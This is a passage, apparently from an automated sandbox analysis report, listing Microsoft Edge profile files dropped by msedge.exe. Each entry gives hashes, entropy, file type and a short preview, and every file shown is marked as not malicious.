Preview:SNSS........@.W............@.W......".@.W............@.W........@.W........@.W........@.W....!...@.W................................@.W.@.W1..,....@.W$...a872195b_d975_4bf5_8be0_a836e1c530c1....@.W........@.W................@.W....@.W........................@.W....................5..0....@.W&...{544A81F3-86CF-4601-B565-C8CB2CA3983A}......@.W........@.W........................@.W............@.W........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........z......z..................................... ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8...............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):20480
Entropy (8bit):0.44194574462308833
Encrypted:false
SSDEEP:
MD5:B35F740AA7FFEA282E525838EABFE0A6
SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):345
Entropy (8bit):5.1470521582219675
Encrypted:false
SSDEEP:
MD5:0FEBD436A03627157FDB4C80A1284B57
SHA1:37B1C635C6A91C8E99A341DEB4675BB7FC817257
SHA-256:EB1AF1F8BA2E45F8D72C169FB437B0B5C621BD1B8088E90C914285ACF46C2A1D
SHA-512:66B6B835FBADCA43EE04A3804B655F2960CBDFC78991AAF693F7EC2D4647A5C832A95C01A08E94AE1DC8ED3F200C280874C5F833FDA502DA227E7E0590F42EF3
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.637 6f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/06/26-01:52:47.638 6f0 Recovering log #3.2024/06/26-01:52:47.638 6f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Reputation:unknown
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):427
Entropy (8bit):5.2173420541700155
Encrypted:false
SSDEEP:
MD5:34D685DDA6AFE57AB77C19B2694EA53B
SHA1:9490D8ED768D1E2B8D30B7DB2A48D5EB325111CF
SHA-256:F192CCAF6DEDD8BD3A78BDAA96075461BB6A4DCF2F56FABF5E5D982CB598F503
SHA-512:B2D06F00EB3CE76D70F9DE784D01301D0F9402AA66F3CAFAD6D66913182CC19C0B692A4C1793A7326CDF0FEE6ED08A29618B5AC00AC7E9868F84100B45D3505D
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:48.396 280 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/06/26-01:52:48.400 280 Recovering log #3.2024/06/26-01:52:48.406 280 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):36864
Entropy (8bit):0.3886039372934488
Encrypted:false
SSDEEP:
MD5:DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):80
Entropy (8bit):3.4921535629071894
Encrypted:false
SSDEEP:
MD5:69449520FD9C139C534E2970342C6BD8
SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:false
Reputation:unknown
Preview:*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):415
Entropy (8bit):5.224220324227996
Encrypted:false
SSDEEP:
MD5:2E1FC4469A8ED9F058C03C16D118F29D
SHA1:3189B24635C3BF4FA6B47735BCBDA1C8674F9070
SHA-256:AD22ACD6A412694B353E9CE372A795F1D11D3C5A1DA359336FCC7ACBF7F0780D
SHA-512:32F83AF6F024758F2D1F88D1D058FA53AE66536A585FD1BD6292636EA364B22331BE375F3E3C79106CED7DB87715BE20253A97D4FBD87742E5FB91A4F1323439
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:53:03.905 280 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/06/26-01:53:03.906 280 Recovering log #3.2024/06/26-01:53:03.910 280 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):321
Entropy (8bit):5.156702747525691
Encrypted:false
SSDEEP:
MD5:22901D146E1F7C1BD6CB18D25337BE09
SHA1:40405DE29BBF292BF4B35FB020A2584D661B7494
SHA-256:982B3D92789D7C68FF600EB6B273A0B317DEAD79F7CA71BAA5B45F42B9F1E6C1
SHA-512:E53CD2D907656AFE2C0B523C62297397B5D22D124CE8F7474CABD272AA2702FA756058AC3BE72FB932D8DC8001703B171E79B85A7164C41DE3D2DCA5915943D8
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.651 a00 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/06/26-01:52:47.665 a00 Recovering log #3.2024/06/26-01:52:47.665 a00 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:dropped
Size (bytes):196608
Entropy (8bit):1.265581239472946
Encrypted:false
SSDEEP:
MD5:1746F848932A6617117A771B1BF2BFD8
SHA1:6ABF2B29BA7AA6D55D46FDE582AD84A55482D3AB
SHA-256:C7D6B30DAA8EAE0FCD3E37B5B5D123776830D09E9964747215C0C0C87A9CED1F
SHA-512:993BA1574B68D3849D53EBFA86EF39C9332957F7635A6813CA36C7C4B5350A75B15ECD35748444D46318BCA982605144AC597C6C56A1829C24AA6AEB74A909ED
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.4670153698770146
Encrypted:false
SSDEEP:
MD5:98EBD0D24E1B4E3597AB4E5236B8139B
SHA1:F9D46FC913F119AE07ABE561B583BD5D2C942827
SHA-256:D0818B00AC61A5E16F703D997FDC03B98E19ABBB4F2CEA5CEF5A1B1084D4E23D
SHA-512:E34AAD6ECBF0110CA3722CD9A26B8F0621C3E76D2DD128DE435D0DA4D10D776C2ADCDBEF1CFDED6E2DF23F0101FC59194F63703E2A94FC7D78D4F8F843DF583D
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ac55a963-ac42-4b92-b04f-c8e699b847cf.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (1597), with CRLF line terminators
Category:dropped
Size (bytes):115717
Entropy (8bit):5.183660917461099
Encrypted:false
SSDEEP:
MD5:3D8183370B5E2A9D11D43EBEF474B305
SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:false
Reputation:unknown
Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with very long lines (3951), with CRLF line terminators
Category:dropped
Size (bytes):11755
Entropy (8bit):5.190465908239046
Encrypted:false
SSDEEP:
MD5:07301A857C41B5854E6F84CA00B81EA0
SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:false
Reputation:unknown
Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b0513a7f-b3e8-4e85-9a02-1c2b088278f0.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (17418), with no line terminators
Category:modified
Size (bytes):17421
Entropy (8bit):5.466189964149633
Encrypted:false
SSDEEP:
MD5:1D81249047C822065C0B3FD1320B4D99
SHA1:389CC96D33BA0BE160966EEA0B40732E370834FE
SHA-256:3E92B71256163D6C9EE76CCE37EE065044E81DA917EDD03070EF9E79A40ED911
SHA-512:8F30AB12BE4A149B150B8417F5F4DAF3275178A258FEB10E043E5BE833B38D7C93758CA85A9540F363A89B93E460BBA5159529B95E4846B83977509050DEAB53
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d229f45f-9cdf-419a-ab58-6c31822b7a2a.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (17255), with no line terminators
Category:dropped
Size (bytes):17258
Entropy (8bit):5.469733428416873
Encrypted:false
SSDEEP:
MD5:9D0830D4A43CD0F74A76C68AFE8E56CD
SHA1:EF9FC75A0102928ACE78A8D8052B7899D4E23FE7
SHA-256:19D3DD5C6AB547122A657654A30329F0EFB39D45CFE737442613F74C72493D31
SHA-512:662EDE17420CE5DCCE3FE9D9A3C47BF86EFEC758488B7DAF532F9E208EFA7D9916AF34CD5ADC4D7687F2AAD24681B04BF99AEB08A8807AFB70A561060FF64221
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):28672
Entropy (8bit):0.3410017321959524
Encrypted:false
SSDEEP:
MD5:98643AF1CA5C0FE03CE8C687189CE56B
SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f79b3022-2609-4fa0-8ca4-afbd53e40a57.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (16388), with no line terminators
Category:dropped
Size (bytes):16391
Entropy (8bit):5.429086170412261
Encrypted:false
SSDEEP:
MD5:32583DD225AADB0233DD9FCFBBCFCB45
SHA1:9DA1ACE60F34C0373AEAECDFC94EB8B95A0BDE9D
SHA-256:868A8BB16580C6CBF398A05C3CF925F2A6248DCFAB0428909A277B2155BF27C3
SHA-512:C15BABCE2727713D12706D2C0813C2DACE693B9CD7F58482081557EFA6F9D45520BD3F8A9581DF8C6FE97EC87528192A38ABA344F6AB74EB4347417220DE04DF
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.09605452508280106
Encrypted:false
SSDEEP:
MD5:52D09034948CD67F75720448CDBAB428
SHA1:4A99E059275DBE157371507D414A99CAD2755CA0
SHA-256:5AF25024F027C881F4D104C69D3FFD700C576587897CDA87487970DF7A2E6046
SHA-512:90D5F26B27266C508AF99358DD739721042B47D6C894FD1F3978000FF6A1FFA53CE336A4A23FB8EF9ABD78B679E64A21768592DF856FA932B03B41A4EB88B6F3
Malicious:false
Reputation:unknown
Preview:..-.............E.........}b1..^..>l_....g......-.............E.........}b1..^..>l_....g............A...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite Write-Ahead Log, version 3007000
Category:dropped
Size (bytes):284312
Entropy (8bit):0.8034460461260187
Encrypted:false
SSDEEP:
MD5:2CD106AA95FF8533626674B34F4C8782
SHA1:036A1107104F3E443CD8659A225E716465DD7DDD
SHA-256:91A60742AB39E29A177010A0CA4DF45BF4394596A99C0782D69AE00116C260EF
SHA-512:A89553E4E8D03E344E471402F07E4012E61A578E754A167B98DC23BFDFC3253821776B8EF23B532EFA35BE0A68F374695FEBFDA7EE984D130AB08B5DF5FC6C8D
Malicious:false
Reputation:unknown
Preview:7....-..........^..>l_.....q..$.........^..>l_..X....9I4SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):580
Entropy (8bit):3.7468939033510136
Encrypted:false
SSDEEP:
MD5:DB1A746F4C3ECCB8B0407960606CAD9F
SHA1:FB1708E4533BD1BB75686E52129C1BD11A19A6A1
SHA-256:594DDD525B766BB7B32A4504F558BA7C12BFB219BFCB7F055D20178129D3A2DC
SHA-512:3F9D6176797B549D0FAE35800283C6286611CB7854BD30DE419F70969FDE6BDB0F3B886079E40CB7192B80BD18466C75B25D1A8583F64C65D0293835DF539424
Malicious:false
Reputation:unknown
Preview:A..r.................20_1_1...1.,U.................20_1_1...1?.Q;0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................D..;...............#38_h.......6.Z..W.F......=.......=...........V.e................XdM?0................39_config..........6.....n ...1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):320
Entropy (8bit):5.1967891648240885
Encrypted:false
SSDEEP:
MD5:F95865A30C3ABB64443AB5D9AF03E1F1
SHA1:73DABC0DEE5DB32CB06BEEE62E5E1C6ADF570969
SHA-256:44AFD80F71DF71ACEEB402ECFBCCCC871A3FB0C4CD1E2A3DFFDB2D0BA3A779CE
SHA-512:0786066AC3C0999778E7CEAB50D0B99F330CC1D68DCE2D01FD71F161574852B2ED3A9E3340306044091CBD8ED146DD3E3A78B93E234F1438B67EBB8D898BD5FD
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:48.088 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/06/26-01:52:48.089 1ee0 Recovering log #3.2024/06/26-01:52:48.089 1ee0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):816
Entropy (8bit):4.0647916882227655
Encrypted:false
SSDEEP:
MD5:3BE72D8D40752B3A97028FDB2931FABA
SHA1:A27EA4726857A948F0A4B074062B674469A9A371
SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
Malicious:false
Reputation:unknown
Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):338
Entropy (8bit):5.183260604253636
Encrypted:false
SSDEEP:
MD5:07A08A6F4B9FD690E68B8F134FED9680
SHA1:9F7FA93ADF207C178C8FD07E09292ECE8A985401
SHA-256:0CF2DBD56CF2A8E7B0D71287E07B16DDDC6437505ABA0CDA67668928CF8E0712
SHA-512:0D97DBA73FC7B51E63F24C88AF9E3EAA660DBC93104A9ABAA26B5590D8E35DC1E10AC25706E1546448DC26EB04394D0E173B4B8A1F6213A628706E8BF4296177
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:48.079 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/06/26-01:52:48.081 1ee0 Recovering log #3.2024/06/26-01:52:48.082 1ee0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):120
Entropy (8bit):3.32524464792714
Encrypted:false
SSDEEP:
MD5:A397E5983D4A1619E36143B4D804B870
SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:false
Reputation:unknown
Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):13
Entropy (8bit):2.7192945256669794
Encrypted:false
SSDEEP:
MD5:BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:false
Reputation:unknown
